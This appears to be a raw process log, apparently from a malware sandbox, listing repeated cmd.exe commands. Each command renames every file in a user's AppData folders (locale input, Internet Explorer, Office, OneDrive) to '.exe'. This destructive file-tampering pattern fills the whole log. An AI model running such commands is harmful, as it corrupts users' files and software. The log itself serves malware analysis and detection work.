C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-MC\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-ML\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-RE\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-SN\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\gl-ES\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ha-Latn-NG\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\he-IL\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\hi-IN\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\hr-BA\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\hr-HR\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\hu-HU\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\hy-AM\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\id-ID\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\it-CH\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\it-IT\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ka-GE\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\kk-KZ\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\lt-LT\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\lv-LV\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\mk-MK\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ms-BN\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ms-MY\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\nb-NO\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\nl-BE\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\nl-NL\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\pl-PL\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\pt-BR\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\pt-PT\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ro-MD\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ro-RO\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ru-RU\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sk-SK\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sl-SI\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sq-AL\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sr-Cyrl-BA\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sr-Cyrl-ME\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sr-Cyrl-RS\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sr-Latn-BA\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sr-Latn-ME\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sr-Latn-RS\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sv-FI\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\sv-SE\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\tr-TR\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\uk-UA\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\uz-Latn-UZ\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\CacheStorage\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\EmieSiteList\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\EmieUserList\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\IECompatData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\TabRoaming\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tracking Protection\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\12x02cr\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\osplltc\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\000183B2\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\DLP\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\Licenses\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\Licenses\5\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\logs\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\setup\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\af\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\amd64\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\am-ET\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ar\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\arm64\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\as-IN\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\az-Latn-AZ\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\be\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bg\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bn-BD\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bn-IN\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bs-Latn-BA\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ca\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ca-Es-VALENCIA\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\cs\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\cy-GB\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\da\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\de\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\el\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en-GB\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en-US\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\es\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\et\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\eu\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fa\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fi\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fil-PH\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fr\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ga-IE\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gd\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gl\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gu\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ha-Latn-NG\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\he\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hi\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hr\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hu\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\id\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\imageformats\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ig-NG\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\images\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\IRMProtectors\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\is\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\it\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ja\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ka\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kk\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\km-KH\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kn\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ko\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kok\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ku-Arab\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ky\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lb-LU\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lt\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lv\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mi-NZ\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mk\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ml-IN\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mn\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mr\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ms\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mt-MT\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nb-NO\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ne-NP\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nl\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nn-NO\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nso-ZA\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\or-IN\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pa\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pa-Arab-PK\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pl\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\platforms\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\prs-AF\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pt-BR\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pt-PT\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\quc\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\quz-PE\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ro\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ru\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\rw\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sd-Arab-PK\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\si-LK\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sk\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sl\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sq\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sr-Cyrl-BA\*.*" "*.exe"
C:\Windows\System32\cmd.exe
